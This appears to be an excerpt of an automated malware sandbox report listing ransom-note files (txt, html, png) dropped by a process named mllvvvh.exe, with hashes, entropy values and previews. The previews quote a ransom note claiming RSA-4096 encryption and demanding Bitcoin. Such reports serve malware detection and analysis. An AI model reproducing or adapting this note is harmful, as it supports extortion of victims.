                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\LfSvc\Cache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\LfSvc\Geofence\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\LfSvc\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
